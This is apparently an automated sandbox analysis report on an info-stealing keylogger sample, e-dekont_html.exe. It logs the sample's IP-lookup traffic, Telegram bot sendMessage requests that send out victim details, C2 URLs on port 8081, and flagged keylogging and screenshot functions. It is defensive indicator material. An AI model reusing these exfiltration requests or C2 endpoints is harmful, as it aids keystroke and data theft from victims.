                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.7:49722 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.7:49754 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20and%20Time:%2006/02/2025%20/%2017:39:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20579569%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20and%20Time:%2006/02/2025%20/%2017:09:47%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20579569%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 06 Feb 2025 10:15:51 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 06 Feb 2025 10:15:55 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: e-dekont_html.exe, 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: e-dekont_html.exe, 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3789902160.0000000003231000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002981000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: e-dekont_html.exe, 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3789902160.0000000003231000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002981000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: e-dekont_html.exe, 0000000A.00000002.3789902160.0000000003231000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: e-dekont_html.exe, 0000000A.00000002.3789902160.0000000003231000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: e-dekont_html.exe, 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: e-dekont_html.exe, 00000000.00000002.1366238188.00000000029D9000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3789902160.0000000003231000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 0000000B.00000002.1402705839.00000000029C9000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: e-dekont_html.exe, HvgRSvNGGXnNtV.exe.0.drString found in binary or memory: http://tempuri.org/DataSet1.xsd
                Source: e-dekont_html.exe, 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3789902160.0000000003231000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002981000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004251000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004547000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.00000000039A3000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: e-dekont_html.exe, 0000000A.00000002.3789902160.000000000331A000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002A6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: e-dekont_html.exe, 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3789902160.000000000331A000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: e-dekont_html.exe, 0000000A.00000002.3789902160.000000000331A000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002A6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: e-dekont_html.exe, 0000000A.00000002.3789902160.000000000331A000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002A6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20a
                Source: e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004251000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004547000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.00000000039A3000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004251000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004547000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.00000000039A3000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004251000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004547000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.00000000039A3000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002B1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en0
                Source: e-dekont_html.exe, 0000000A.00000002.3789902160.00000000033C5000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002B15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004251000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004547000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004251000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004547000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004251000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004547000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: e-dekont_html.exe, 0000000A.00000002.3789902160.000000000331A000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3789902160.0000000003284000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3789902160.00000000032F3000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.00000000029D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: e-dekont_html.exe, 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3789902160.0000000003284000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.00000000029D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.00000000029D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: e-dekont_html.exe, 0000000A.00000002.3789902160.00000000032AE000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3789902160.000000000331A000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3789902160.00000000032F3000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.00000000029FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004251000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004547000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.00000000039A3000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004251000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004547000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002B4C000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002B3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002B3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/0
                Source: e-dekont_html.exe, 0000000A.00000002.3789902160.00000000033F7000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002B47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49827 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49861 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                Source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                Source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode
